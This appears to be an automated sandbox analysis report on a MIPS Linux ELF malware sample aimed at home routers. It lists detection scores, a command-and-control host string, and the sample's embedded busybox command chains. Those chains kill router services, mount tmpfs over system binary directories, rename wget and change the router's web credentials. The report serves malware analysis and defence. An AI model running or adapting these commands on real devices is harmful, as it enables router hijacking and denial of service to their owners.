Click to jump to signature section
Source: file.elf | Virustotal: Detection: 62% | Perma Link |
Source: file.elf | ReversingLabs: Detection: 65% |
Source: file.elf | String found in binary or memory: http://%s:%d/d/index.html |
Source: file.elf | String found in binary or memory: http://%s:%d/d/index.htmlcnc.pinklander.com/tmp/pink/cache_finder_page_webhttp://%s//tmp/pink/fc_ip% |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 37680 |
Source: unknown | Network traffic detected: HTTP traffic on port 37680 -> 443 |
Source: Initial sample | String containing 'busybox' found: busybox killall -9 httpd |
Source: Initial sample | String containing 'busybox' found: busybox killall -9 tr69c |
Source: Initial sample | String containing 'busybox' found: busybox killall -9 lld2d |
Source: Initial sample | String containing 'busybox' found: busybox killall -9 pptp |
Source: Initial sample | String containing 'busybox' found: busybox killall -9 openl2tpd |
Source: Initial sample | String containing 'busybox' found: rm -rf /tmp/mybin;rm -rf /tmp/mytool;mkdir /tmp/mybin;mkdir /tmp/mytool;cp -rf /bin/* /tmp/mybin/;cp /bin/busybox /tmp/mytool/mount;cp /bin/busybox /tmp/mytool/cp;chmod 777 /tmp/mytool/*;rm -rf /tmp/mybin/tr69c;rm -rf /tmp/mybin/pptp;rm -rf /tmp/mybin/openl2tpd;rm -rf /tmp/mybin/lld2d;rm -rf /tmp/mybin/sntp;rm -rf /tmp/mybin/httpd;mount -t tmpfs -o size=40m tmpfs /bin;/tmp/mytool/cp -rf /tmp/mybin/* /bin/;rm -rf /tmp/mybin;rm -rf /tmp/mytool |
Source: Initial sample | String containing 'busybox' found: rm -rf /tmp/mybin;rm -rf /tmp/mytool;mkdir /tmp/mybin;mkdir /tmp/mytool;cp -rf /bin/* /tmp/mybin/;cp /bin/busybox /tmp/mytool/mount;cp /bin/busybox /tmp/mytool/cp;chmod 777 /tmp/mytool/*;rm -rf /tmp/mybin/tr69c;rm -rf /tmp/mybin/pptp;rm -rf /tmp/mybin/openl2tpd;rm -rf /tmp/mybin/lld2d;rm -rf /tmp/mybin/sntp;rm -rf /tmp/mybin/httpd;mount -t tmpfs -o size=40m tmpfs /bin;/tmp/mytool/cp -rf /tmp/mybin/* /bin/;rm -rf /tmp/mybin/*;cp -rf /usr/bin/* /tmp/mybin/;mount -t tmpfs -o size=1m tmpfs /usr/bin;cp -rf /tmp/mybin/* /usr/bin/;rm -rf /tmp/mybin;mount -t tmpfs -o size=1 tmpfs /sbin;mv /usr/bin/wget /usr/bin/init;cp /usr/bin/init /usr/bin/ifconfig;rm -rf /usr/bin/killall; |
Source: Initial sample | String containing 'busybox' found: busybox killall -9 sntp |
Source: Initial sample | String containing 'busybox' found: :%04X /proc/net/tcp/proc/net/udp/proc//proc/%s/fd/proc/%s/fd/%s%dfilterINPUTTCPDROPUDPACCEPTupnptelnetdigdmptdr/bin/mdm getvalues %s.NameTR069VOIPVOICESIPINTERNETIPTV/bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnection./bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnectionInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANIPConnection.%dWANPPPConnection./bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANPPPConnectionInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d.WANPPPConnection.%d/bin/mdm getnames InternetGatewayDevice.WANDevice.1InternetGatewayDevice.WANDevice.1.WANConnectionDevice/bin/mdm getnames InternetGatewayDevice.WANDevice.1.WANConnectionDeviceInternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d/tmp/kt/bin/mdm delobject InternetGatewayDevice.WANDevice.1.WANConnectionDevice.%d/bin/mdm setvalues InternetGatewayDevice.X_CU_Function.Web.UserName "%s"/bin/mdm setvalues InternetGatewa |
Source: classification engine | Classification label: mal56.linELF@0/0@0/0 |
Source: /usr/bin/dash (PID: 5470) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2OKGkk76tS /tmp/tmp.XjTroAZnDg /tmp/tmp.w1dveJcJVJ | Jump to behavior |
Source: /usr/bin/dash (PID: 5471) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2OKGkk76tS /tmp/tmp.XjTroAZnDg /tmp/tmp.w1dveJcJVJ | Jump to behavior |
Source: /tmp/file.elf (PID: 5423) | Queries kernel information via 'uname': | Jump to behavior |
Source: file.elf, 5423.1.000055f3471ad000.000055f347234000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/mipsel |
Source: file.elf, 5423.1.000055f3471ad000.000055f347234000.rw-.sdmp | Binary or memory string: U!/etc/qemu-binfmt/mipsel |
Source: file.elf, 5423.1.00007ffd88791000.00007ffd887b2000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-mipsel |
Source: file.elf, 5423.1.00007ffd88791000.00007ffd887b2000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/file.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/file.elf |